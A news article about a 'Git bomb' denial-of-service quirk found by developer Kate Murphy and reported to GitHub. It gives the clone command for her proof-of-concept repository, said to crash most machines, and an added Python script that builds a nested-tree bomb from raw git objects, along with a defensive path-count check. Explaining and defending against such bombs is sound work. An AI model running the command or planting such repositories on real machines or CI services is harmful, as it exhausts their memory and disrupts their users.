A quirk in the way Git handles data deduplication can be exploited to crash most computers with a single Git command.
Developer Kate Murphy said this "Git bombing" can be pulled off by building a repository of just twelve 4KB objects, arranged so that cloning it fills all available RAM and swap until the machine either falls over or the Git process is killed – a denial of service, in other words.
The crash is triggered with the following command:
$ git clone https://github.com/Katee/git-bomb-segfault.git
Like the Billion Laughs XML bomb, the Git Bomb relies on nested references: each tree object in the repository points to the same child tree many times, so a dozen deduplicated objects unpack into a billion files, flooding memory and storage when Git tries to check them out.
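To make the mechanism concrete, here is an added example (not Murphy's code and not the repository linked above) that builds a miniature bomb out of raw git objects and then runs the check a hosting or CI service would want: counting how many paths a commit expands to before checking it out. The depth-10/fanout-10 layout, the blob content and the commit metadata are assumptions for illustration; the page only gives the object count and the rough expansion. Objects are written in git's real loose-object format, so the output of write_loose_objects() can be examined with git cat-file or git fsck.

```python
"""Miniature git bomb built from raw git objects, plus an expansion check.

Constructed example.  Uses git's loose-object format (SHA-1 over
"<type> <len>\\0<body>", zlib-compressed on disk).
"""
import hashlib
import os
import zlib

BLOB_MODE = "100644"
TREE_MODE = "40000"   # git writes directory entries as "40000", not "040000"


def git_object(kind: str, body: bytes) -> tuple[str, bytes]:
    """Return (sha1_hex, raw_object) for a git object of the given type."""
    raw = f"{kind} {len(body)}\0".encode() + body
    return hashlib.sha1(raw).hexdigest(), raw


def tree_entry(mode: str, name: str, sha_hex: str) -> bytes:
    """One tree entry: "<mode> <name>\\0" followed by the 20 raw SHA-1 bytes."""
    return f"{mode} {name}\0".encode() + bytes.fromhex(sha_hex)


def build_bomb(depth: int, fanout: int) -> tuple[dict, str]:
    """One blob, `depth` tree levels each referencing the previous level
    `fanout` times, and one commit.  Every level is a single tree object
    referenced many times, so the store holds depth + 2 objects while a
    checkout would create fanout**depth paths.  (Assumed shape, see lead-in.)
    Returns (store, commit_sha); store maps sha -> raw object bytes.
    """
    store = {}
    sha, raw = git_object("blob", b"ha\n")          # constructed content
    store[sha] = raw
    child_sha, child_mode = sha, BLOB_MODE
    for _ in range(depth):
        names = sorted(f"d{i}" for i in range(fanout))   # git needs sorted names
        body = b"".join(tree_entry(child_mode, n, child_sha) for n in names)
        sha, raw = git_object("tree", body)
        store[sha] = raw
        child_sha, child_mode = sha, TREE_MODE
    commit_body = (
        f"tree {child_sha}\n"
        "author Example <example@example.invalid> 0 +0000\n"
        "committer Example <example@example.invalid> 0 +0000\n"
        "\nminiature git bomb (constructed example)\n"
    ).encode()
    sha, raw = git_object("commit", commit_body)
    store[sha] = raw
    return store, sha


def parse_tree(raw: bytes):
    """Yield (mode, name, sha_hex) entries from a raw tree object."""
    body = raw[raw.index(b"\0") + 1:]
    i = 0
    while i < len(body):
        space = body.index(b" ", i)
        nul = body.index(b"\0", space)
        yield (body[i:space].decode(), body[space + 1:nul].decode(),
               body[nul + 1:nul + 21].hex())
        i = nul + 21


def tree_of_commit(store: dict, commit_sha: str) -> str:
    """Read the root tree SHA from the commit's first header line."""
    body = store[commit_sha][store[commit_sha].index(b"\0") + 1:]
    return body.split(b"\n", 1)[0].split(b" ", 1)[1].decode()


def expanded_path_count(store: dict, tree_sha: str, memo=None) -> int:
    """Non-directory paths a checkout of `tree_sha` would create.

    Memoised per tree SHA: cost is proportional to the number of distinct
    tree objects, not to the number of paths, which is what lets a server
    reject a bomb without walking a billion entries.
    """
    memo = {} if memo is None else memo
    if tree_sha not in memo:
        total = 0
        for mode, _name, sha in parse_tree(store[tree_sha]):
            total += expanded_path_count(store, sha, memo) if mode == TREE_MODE else 1
        memo[tree_sha] = total
    return memo[tree_sha]


def within_budget(store: dict, commit_sha: str, max_paths: int) -> tuple[int, bool]:
    """Server-side check: refuse commits whose checkout exceeds max_paths."""
    n = expanded_path_count(store, tree_of_commit(store, commit_sha))
    return n, n <= max_paths


def loose_object_path(sha: str) -> str:
    """Relative path of a loose object under .git: objects/xx/yyyy..."""
    return os.path.join("objects", sha[:2], sha[2:])


def write_loose_objects(store: dict, git_dir: str) -> None:
    """Write every object zlib-compressed into git_dir in git's loose layout."""
    for sha, raw in store.items():
        path = os.path.join(git_dir, loose_object_path(sha))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(zlib.compress(raw))


if __name__ == "__main__":
    store, commit = build_bomb(depth=10, fanout=10)
    paths, ok = within_budget(store, commit, max_paths=1_000_000)
    print(f"{len(store)} objects expand to {paths:,} paths; within budget: {ok}")
```

The point of the memoised walk is that the cheap part of a clone (fetching a dozen objects) and the expensive part (materialising an index entry and a file for every path) differ by ten orders of magnitude here; a pre-receive or pre-checkout check that counts paths per unique tree sees the bomb in a handful of steps, while a naive checkout does not.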
Murphy told The Register she discovered the oddity in the open-source code management tool while working with fellow developer Wesley Aptekar-Cassels to examine the way Git handles the nesting of large objects.
"I wasn't looking for this bug in particular; I was just exploring how git handles weird situations with Wesley," Murphy explained.
"With him I learned a bunch about git internals by crafting many weird repos, exploring the behaviour with a debugger, and reading relevant source code."
After crafting the proof-of-concept repo, Murphy said she reported the issue to Git-hosting biz GitHub, which has since kicked out an update to reject Git Bomb repositories and this week credited Murphy with the find, paying her a bounty via HackerOne.
Murphy said that while the issue wasn't a straightforward security flaw that put machines at risk, it illustrates the problems and quirks that can arise when running continuous-integration and other developer tooling on other people's repositories.
"It's not really a random flaw, it's just a hard balance to strike. GitHub and other services like them (especially CI services that run your entire test suite) need to do a bunch of computation for you," the programmer said. "Vanilla git does have some specific flaws when it comes to the directory walking. Companies have needed to write their own code to be able to handle repos beyond a certain size."